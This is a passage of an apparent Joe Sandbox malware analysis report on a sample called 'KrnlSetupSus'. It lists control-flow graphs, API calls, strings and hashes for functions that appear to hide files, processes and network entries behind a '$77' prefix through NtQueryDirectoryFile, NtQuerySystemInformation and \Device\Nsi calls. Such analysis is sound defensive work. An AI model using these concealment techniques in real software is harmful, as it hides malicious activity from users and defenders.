                                                                                                                                  control_flow_graph 51 1c562dd0-1c562e49 NtDeviceIoControlFile 52 1c563154-1c563177 51->52 53 1c562e4f-1c562e55 51->53 53->52 54 1c562e5b-1c562e5e 53->54 54->52 55 1c562e64-1c562e67 54->55 55->52 56 1c562e6d-1c562e7d GetModuleHandleA 55->56 57 1c562e91 56->57 58 1c562e7f-1c562e8f GetProcAddress 56->58 59 1c562e94-1c562eb2 57->59 58->59 59->52 61 1c562eb8-1c562ed7 StrCmpNIW 59->61 61->52 62 1c562edd-1c562ee1 61->62 62->52 63 1c562ee7-1c562ef1 62->63 63->52 64 1c562ef7-1c562efe 63->64 64->52 65 1c562f04-1c562f17 64->65 66 1c562f27 65->66 67 1c562f19-1c562f25 65->67 68 1c562f2a-1c562f2e 66->68 67->68 69 1c562f30-1c562f3c 68->69 70 1c562f3e 68->70 71 1c562f41-1c562f4b 69->71 70->71 72 1c563031-1c563035 71->72 73 1c562f51-1c562f54 71->73 76 1c563146-1c56314e 72->76 77 1c56303b-1c56303e 72->77 74 1c562f66-1c562f70 73->74 75 1c562f56-1c562f63 call 1c561a30 73->75 79 1c562fa4-1c562fae 74->79 80 1c562f72-1c562f7f 74->80 75->74 76->52 76->65 81 1c563040-1c56304c call 1c561a30 77->81 82 1c56304f-1c563059 77->82 87 1c562fb0-1c562fbd 79->87 88 1c562fde-1c562fe1 79->88 80->79 86 1c562f81-1c562f8e 80->86 81->82 83 1c56305b-1c563068 82->83 84 1c563089-1c56308c 82->84 83->84 90 1c56306a-1c563077 83->90 91 1c56308e-1c563097 call 1c561cc0 84->91 92 1c563099-1c5630a6 lstrlenW 84->92 93 1c562f91-1c562f97 86->93 87->88 94 1c562fbf-1c562fcc 87->94 96 1c562fe3-1c562fed call 1c561cc0 88->96 97 1c562fef-1c562ffc lstrlenW 88->97 99 1c56307a-1c563080 90->99 91->92 110 1c5630ca-1c5630d5 91->110 105 1c5630a8-1c5630b7 call 1c561cf8 92->105 106 1c5630b9-1c5630c3 call 1c563d4c 92->106 103 1c563027-1c56302c 93->103 104 1c562f9d-1c562fa2 93->104 107 1c562fcf-1c562fd5 94->107 96->97 96->103 100 1c562ffe-1c56300d call 1c561cf8 97->100 101 1c56300f-1c563021 call 1c563d4c 97->101 109 1c563082-1c563087 99->109 99->110 100->101 100->103 101->103 114 1c5630c6-1c5630c8 101->114 103->114 104->79 104->93 105->106 105->110 106->114 107->103 117 1c562fd7-1c562fdc 107->117 109->84 109->99 118 1c5630d7-1c5630f7 call 1c573800 110->118 119 1c563140-1c563144 110->119 114->76 114->110 117->88 117->107 126 1c56311a-1c56311d 118->126 127 1c5630f9-1c563117 call 1c573800 118->127 119->76 126->119 129 1c56311f-1c56313d call 1c573800 126->129 127->126 129->119
                                                                                                                                  APIs
                                                                                                                                  • NtDeviceIoControlFile.NTDLL ref: 1C562E3B
                                                                                                                                  • GetModuleHandleA.KERNEL32 ref: 1C562E74
                                                                                                                                  • lstrlenW.KERNEL32 ref: 1C56309E
                                                                                                                                    • Part of subcall function 1C561A30: OpenProcess.KERNEL32 ref: 1C561A56
                                                                                                                                    • Part of subcall function 1C561A30: K32GetProcessImageFileNameW.KERNEL32 ref: 1C561A72
                                                                                                                                    • Part of subcall function 1C561A30: PathFindFileNameW.SHLWAPI ref: 1C561A81
                                                                                                                                    • Part of subcall function 1C561A30: lstrlenW.KERNEL32 ref: 1C561A8D
                                                                                                                                    • Part of subcall function 1C561A30: StrCpyW.SHLWAPI ref: 1C561AA0
                                                                                                                                    • Part of subcall function 1C561A30: CloseHandle.KERNEL32 ref: 1C561AAE
                                                                                                                                  • GetProcAddress.KERNEL32 ref: 1C562E89
                                                                                                                                    • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
                                                                                                                                  • StrCmpNIW.SHLWAPI ref: 1C562ECC
                                                                                                                                  • lstrlenW.KERNEL32 ref: 1C562FF4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Filelstrlen$HandleNameProcess$AddressCloseControlDeviceFindImageModuleOpenPathProc
                                                                                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                  • API String ID: 1066285882-3850299575
                                                                                                                                  • Opcode ID: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction ID: 0f0b9c6f4b36b640b45cc234adc9ea0da301c2eb6402e5cc7b848dd40ea7aa52
                                                                                                                                  • Opcode Fuzzy Hash: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
                                                                                                                                  • Instruction Fuzzy Hash: CB91E2B6321BA086EB18CF26D9407AAB3A5FB84FD4F505116EE4993F15EF34D888C350
                                                                                                                                  Function 1C56242C Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 44filethreadnativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ProcessThread$CloseCreateCurrentHandleReadResumeWrite
                                                                                                                                  • String ID: \\.\pipe\$77childproc
                                                                                                                                  • API String ID: 422971377-421986751
                                                                                                                                  • Opcode ID: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction ID: 12cc51de5d1dfd52c73b207ef139dc5263c67817de64dc053f0f2804392ef173
                                                                                                                                  • Opcode Fuzzy Hash: 6b478bf275f7f707eec9553fd3cd4fa2dc87a7a9d36fcded0365874d1676b014
                                                                                                                                  • Instruction Fuzzy Hash: 80112E72614B9082F710CB21F458B9A7761F789BE5F904215EA9A06BA8DF7CD1D8CB40
                                                                                                                                  Function 1C563398 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93memorynativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 137 1c563398-1c5633ed GetProcessHeap HeapAlloc NtQuerySystemInformation 138 1c5633f3-1c5633f6 137->138 139 1c5634a9-1c5634d7 GetProcessHeap RtlFreeHeap 137->139 140 1c5633fb-1c5633fe 138->140 141 1c5633f8 138->141 142 1c563403-1c563406 140->142 143 1c563400 140->143 141->140 144 1c56340b-1c563411 142->144 145 1c563408 142->145 143->142 146 1c563417-1c563422 144->146 147 1c5634a4 144->147 145->144 148 1c563424-1c563434 146->148 149 1c56344d-1c563457 call 1c561cc0 146->149 147->139 148->149 150 1c563436-1c56344b StrCmpNIW 148->150 152 1c563471-1c563474 149->152 154 1c563459-1c56346f call 1c561d2c 149->154 150->149 150->152 155 1c563476-1c56347a 152->155 156 1c56347d-1c563480 152->156 154->152 160 1c563495-1c563497 154->160 155->156 157 1c563482-1c563486 156->157 158 1c563489-1c56348c 156->158 157->158 158->160 161 1c56348e-1c563492 158->161 160->147 163 1c563499-1c56349e 160->163 161->160 163->146 163->147
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5633BB
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5633CE
                                                                                                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?,?,1C5623E5), ref: 1C5633E5
                                                                                                                                  • StrCmpNIW.SHLWAPI(?,?,?,?,?,1C5623E5), ref: 1C563443
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5634A9
                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,?,?,1C5623E5), ref: 1C5634B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                                                                                                  • String ID: $77
                                                                                                                                  • API String ID: 722747020-3904844309
                                                                                                                                  • Opcode ID: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction ID: 0d452623d3647760d936ad28f137b2ec0115eeb4410f0a3b23c9b84e4e11aded
                                                                                                                                  • Opcode Fuzzy Hash: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction Fuzzy Hash: 43316B32702BA182EB02CF66E94876AB761FB84F95F548024CF8847F16EF38D0A58310
                                                                                                                                  Function 1C5624F0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 189filenativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 334 1c5624f0-1c562580 NtQueryDirectoryFile 335 1c562586-1c562589 334->335 336 1c5627ae-1c5627d1 334->336 335->336 337 1c56258f-1c56259d 335->337 337->336 338 1c5625a3-1c5625e9 call 1c573ea0 * 3 GetFileType 337->338 345 1c562601-1c56260b call 1c561ad0 338->345 346 1c5625eb-1c5625ff StrCpyW 338->346 347 1c562610-1c562613 345->347 346->347 349 1c56270b-1c562724 call 1c56353c call 1c563d4c 347->349 350 1c562619-1c56261e 347->350 363 1c562726-1c562755 call 1c56353c call 1c5634d8 call 1c561dd0 349->363 364 1c5626b0-1c562705 349->364 352 1c562621-1c562626 350->352 354 1c562643 352->354 355 1c562628-1c56262b 352->355 356 1c562646-1c56265f call 1c56353c call 1c563d4c 354->356 355->354 358 1c56262d-1c562630 355->358 372 1c562665-1c562694 call 1c56353c call 1c5634d8 call 1c561dd0 356->372 373 1c56275d-1c56275f 356->373 358->354 361 1c562632-1c562635 358->361 361->354 365 1c562637-1c56263a 361->365 363->364 389 1c56275b 363->389 364->336 364->349 365->354 366 1c56263c-1c562641 365->366 366->354 366->356 372->373 395 1c56269a-1c5626a5 372->395 375 1c562780-1c562783 373->375 376 1c562761-1c56277b 373->376 379 1c562785-1c56278b 375->379 380 1c56278d-1c562790 375->380 376->352 379->336 383 1c562792-1c562795 380->383 384 1c5627ab 380->384 383->384 387 1c562797-1c56279a 383->387 384->336 387->384 390 1c56279c-1c56279f 387->390 389->336 390->384 392 1c5627a1-1c5627a4 390->392 392->384 394 1c5627a6-1c5627a9 392->394 394->336 394->384 395->352 396 1c5626ab 395->396 396->336
                                                                                                                                  APIs
                                                                                                                                  • NtQueryDirectoryFile.NTDLL ref: 1C562575
                                                                                                                                  • GetFileType.KERNEL32 ref: 1C5625E0
                                                                                                                                  • StrCpyW.SHLWAPI ref: 1C5625F9
                                                                                                                                    • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$DirectoryQueryType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 4175507832-91387939
                                                                                                                                  • Opcode ID: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction ID: 2c2088d032d0eaf900fef1c42de7edd1ba118ab98cff3ece92a6e8160d7ff6d1
                                                                                                                                  • Opcode Fuzzy Hash: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction Fuzzy Hash: 2761BB3A604BE286D721CF36AC507EAAB65F3C9BD4F900126DE4A97F19DE34D245C720
                                                                                                                                  Function 1C5627D4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185filenativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 397 1c5627d4-1c562858 NtQueryDirectoryFileEx 398 1c56285e-1c562861 397->398 399 1c562a7c-1c562a9f 397->399 398->399 400 1c562867-1c562875 398->400 400->399 401 1c56287b-1c5628c1 call 1c573ea0 * 3 GetFileType 400->401 408 1c5628c3-1c5628d7 StrCpyW 401->408 409 1c5628d9-1c5628e3 call 1c561ad0 401->409 410 1c5628e8-1c5628ec 408->410 409->410 412 1c5628f2-1c5628f7 410->412 413 1c5629d9-1c5629f2 call 1c56353c call 1c563d4c 410->413 414 1c5628fa-1c5628ff 412->414 427 1c5629f4-1c562a23 call 1c56353c call 1c5634d8 call 1c561dd0 413->427 428 1c562989-1c5629d3 413->428 416 1c562901-1c562904 414->416 417 1c56291c 414->417 416->417 419 1c562906-1c562909 416->419 420 1c56291f-1c562938 call 1c56353c call 1c563d4c 417->420 419->417 422 1c56290b-1c56290e 419->422 436 1c56293e-1c56296d call 1c56353c call 1c5634d8 call 1c561dd0 420->436 437 1c562a2b-1c562a2d 420->437 422->417 425 1c562910-1c562913 422->425 425->417 429 1c562915-1c56291a 425->429 427->428 451 1c562a29 427->451 428->399 428->413 429->417 429->420 436->437 457 1c562973-1c56297e 436->457 439 1c562a4e-1c562a51 437->439 440 1c562a2f-1c562a49 437->440 443 1c562a53-1c562a59 439->443 444 1c562a5b-1c562a5e 439->444 440->414 443->399 447 1c562a60-1c562a63 444->447 448 1c562a79 444->448 447->448 452 1c562a65-1c562a68 447->452 448->399 451->399 452->448 454 1c562a6a-1c562a6d 452->454 454->448 456 1c562a6f-1c562a72 454->456 456->448 458 1c562a74-1c562a77 456->458 457->414 459 1c562984 457->459 458->399 458->448 459->399
                                                                                                                                  APIs
                                                                                                                                  • NtQueryDirectoryFileEx.NTDLL ref: 1C56284D
                                                                                                                                  • GetFileType.KERNEL32 ref: 1C5628B8
                                                                                                                                  • StrCpyW.SHLWAPI ref: 1C5628D1
                                                                                                                                    • Part of subcall function 1C563D4C: StrCmpNIW.SHLWAPI(?,?,?,1C562722), ref: 1C563D64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$DirectoryQueryType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 4175507832-91387939
                                                                                                                                  • Opcode ID: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction ID: 68020df5d340ea08d8392679aa3dc5818ee3a541264b06bbbf546ff95a5ea133
                                                                                                                                  • Opcode Fuzzy Hash: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction Fuzzy Hash: E961D03A600BA286D724CF66EC543EA7766F3C9BC4F914126DE0A47F18EEB4C285C714
                                                                                                                                  Function 1C562214 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162nativeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 460 1c562214-1c56224e NtQuerySystemInformation 461 1c562257-1c56225a 460->461 462 1c562250-1c562254 460->462 463 1c562260-1c562263 461->463 464 1c56240b-1c56242b 461->464 462->461 465 1c56235b-1c56235e 463->465 466 1c562269-1c56227b 463->466 467 1c562360-1c56237a call 1c563398 465->467 468 1c5623cf-1c5623d2 465->468 466->464 469 1c562281-1c56228d 466->469 467->464 481 1c562380-1c562396 467->481 468->464 470 1c5623d4-1c5623e7 call 1c563398 468->470 472 1c56228f-1c56229f 469->472 473 1c5622bb-1c5622c6 call 1c561cc0 469->473 470->464 482 1c5623e9-1c5623f1 470->482 472->473 474 1c5622a1-1c5622b9 StrCmpNIW 472->474 478 1c5622e7-1c5622f9 473->478 483 1c5622c8-1c5622e0 call 1c561d2c 473->483 474->473 474->478 484 1c5622fb-1c5622fd 478->484 485 1c562309-1c56230b 478->485 481->464 486 1c562398-1c5623b4 481->486 482->464 487 1c5623f3-1c5623fb 482->487 483->478 500 1c5622e2-1c5622e5 483->500 489 1c562304-1c562307 484->489 490 1c5622ff-1c562302 484->490 491 1c562312 485->491 492 1c56230d-1c562310 485->492 493 1c5623b8-1c5623cb 486->493 494 1c5623fe-1c562409 487->494 496 1c562315-1c562318 489->496 490->496 491->496 492->496 493->493 497 1c5623cd 493->497 494->464 494->494 498 1c562326-1c562329 496->498 499 1c56231a-1c562320 496->499 497->464 498->464 501 1c56232f-1c562333 498->501 499->469 499->498 500->496 502 1c562335-1c562338 501->502 503 1c56234a-1c562356 501->503 502->464 504 1c56233e-1c562343 502->504 503->464 504->501 505 1c562345 504->505 505->464
                                                                                                                                  APIs
                                                                                                                                  • NtQuerySystemInformation.NTDLL ref: 1C56223F
                                                                                                                                  • StrCmpNIW.SHLWAPI ref: 1C5622AE
                                                                                                                                    • Part of subcall function 1C563398: GetProcessHeap.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5633BB
                                                                                                                                    • Part of subcall function 1C563398: HeapAlloc.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5633CE
                                                                                                                                    • Part of subcall function 1C563398: NtQuerySystemInformation.NTDLL(?,?,?,?,?,1C5623E5), ref: 1C5633E5
                                                                                                                                    • Part of subcall function 1C563398: StrCmpNIW.SHLWAPI(?,?,?,?,?,1C5623E5), ref: 1C563443
                                                                                                                                    • Part of subcall function 1C563398: GetProcessHeap.KERNEL32(?,?,?,?,?,1C5623E5), ref: 1C5634A9
                                                                                                                                    • Part of subcall function 1C563398: RtlFreeHeap.NTDLL(?,?,?,?,?,1C5623E5), ref: 1C5634B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$InformationProcessQuerySystem$AllocFree
                                                                                                                                  • String ID: $77$S
                                                                                                                                  • API String ID: 1443098332-3174149180
                                                                                                                                  • Opcode ID: d308c3b46bb91a8aa47e79ae8dab7f0f4daab71c5cf7151acd44c2c1b3380d6f
                                                                                                                                  • Instruction ID: 72a9e08b6e3a2303ae83696a683d5311402015051e70963846416422bae5c812
                                                                                                                                  • Opcode Fuzzy Hash: d308c3b46bb91a8aa47e79ae8dab7f0f4daab71c5cf7151acd44c2c1b3380d6f
                                                                                                                                  • Instruction Fuzzy Hash: 6E51D072B12B7586E714CF26DC806AE73A5FB087C8B118525DF4A67F08EB34D892C720
                                                                                                                                  Function 00007FFB4ADF9369 Relevance: 3.9, Strings: 2, Instructions: 1393COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 553 7ffb4adf9369-7ffb4adf93fd call 7ffb4adf9010 call 7ffb4adf0388 call 7ffb4adf81a8 564 7ffb4adf9431-7ffb4adf9454 553->564 565 7ffb4adf93ff-7ffb4adf942c call 7ffb4adf0398 553->565 569 7ffb4adf945a-7ffb4adf9467 564->569 570 7ffb4adfa50d-7ffb4adfa514 564->570 565->564 571 7ffb4adf97c8 569->571 572 7ffb4adf946d-7ffb4adf94ab 569->572 573 7ffb4adfa51e-7ffb4adfa525 570->573 576 7ffb4adf97cd-7ffb4adf9801 571->576 578 7ffb4adfa4e8-7ffb4adfa4ee 572->578 579 7ffb4adf94b1-7ffb4adf94ce call 7ffb4adf8468 572->579 574 7ffb4adfa527-7ffb4adfa531 call 7ffb4adf0378 573->574 575 7ffb4adfa536-7ffb4adfa53d 573->575 574->575 582 7ffb4adf9808-7ffb4adf984a 576->582 583 7ffb4adfa542 578->583 584 7ffb4adfa4f0-7ffb4adfa507 578->584 579->578 587 7ffb4adf94d4-7ffb4adf950e 579->587 597 7ffb4adf986f-7ffb4adf98a3 582->597 598 7ffb4adf984c-7ffb4adf986d 582->598 588 7ffb4adfa547-7ffb4adfa582 583->588 584->569 584->570 594 7ffb4adf9510-7ffb4adf9563 587->594 595 7ffb4adf956d-7ffb4adf9595 587->595 594->595 603 7ffb4adf9e89-7ffb4adf9eb1 595->603 604 7ffb4adf959b-7ffb4adf95a8 595->604 602 7ffb4adf98aa-7ffb4adf98ec 597->602 598->602 621 7ffb4adf9911-7ffb4adf9945 602->621 622 7ffb4adf98ee-7ffb4adf990f 602->622 603->578 612 7ffb4adf9eb7-7ffb4adf9ec4 603->612 604->571 606 7ffb4adf95ae-7ffb4adf96a0 604->606 672 7ffb4adf96a6-7ffb4adf97a3 call 7ffb4adf0358 606->672 673 7ffb4adf9e60-7ffb4adf9e66 606->673 612->571 613 7ffb4adf9eca-7ffb4adf9fc0 612->613 654 7ffb4adf9fc6-7ffb4adfa029 613->654 655 7ffb4adfa63c-7ffb4adfa677 613->655 625 7ffb4adf994c-7ffb4adf9a63 call 7ffb4adf0358 621->625 622->625 690 7ffb4adf9a88-7ffb4adf9abc 625->690 691 7ffb4adf9a65-7ffb4adf9a86 625->691 663 7ffb4adfa67c-7ffb4adfa6b7 654->663 677 7ffb4adfa02f-7ffb4adfa092 654->677 655->663 671 7ffb4adfa6bc-7ffb4adfa6f0 663->671 678 7ffb4adfa6f7 671->678 672->576 722 7ffb4adf97a5-7ffb4adf97c6 672->722 673->583 675 7ffb4adf9e6c-7ffb4adf9e83 673->675 675->603 675->604 677->671 700 7ffb4adfa098-7ffb4adfa160 677->700 678->678 696 7ffb4adf9ac3-7ffb4adf9b5a 690->696 691->696 696->571 726 7ffb4adf9b60-7ffb4adf9d10 call 7ffb4adf0358 696->726 700->578 722->582 726->583 751 7ffb4adf9d16-7ffb4adf9d18 726->751 752 7ffb4adfa587-7ffb4adfa5d4 751->752 753 7ffb4adf9d1e-7ffb4adf9d5c 751->753 764 7ffb4adfa5d6-7ffb4adfa5f7 752->764 765 7ffb4adfa5fc-7ffb4adfa637 752->765 753->588 762 7ffb4adf9d62-7ffb4adf9d93 753->762 767 7ffb4adf9d95-7ffb4adf9ded 762->767 764->765 765->655 775 7ffb4adf9def-7ffb4adf9e0b 767->775 776 7ffb4adf9e3d-7ffb4adf9e5a 767->776 775->767 778 7ffb4adf9e0d-7ffb4adf9e36 775->778 776->673 778->776
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: B$CAN_^
                                                                                                                                  • API String ID: 0-2068767752
                                                                                                                                  • Opcode ID: 1991361e60f16830b913ddff0338af4a2242ea5369b672904271443202ef657c
                                                                                                                                  • Instruction ID: b52dd92c2bb373132711064d783284b7e298890bdb1a41e23638bcc194856295
                                                                                                                                  • Opcode Fuzzy Hash: 1991361e60f16830b913ddff0338af4a2242ea5369b672904271443202ef657c
                                                                                                                                  • Instruction Fuzzy Hash: 58A24FB0A18B098FE798EF38C495779B7E2FF98304F5445B9E44DD3296DE38A8818741
                                                                                                                                  Function 1C562AA0 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Enumerate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 304946047-0
                                                                                                                                  • Opcode ID: 8fff3ed98fbdedef6c13e57d98af9ea7fc8e133c68cb3134a04c8e00e25e0472
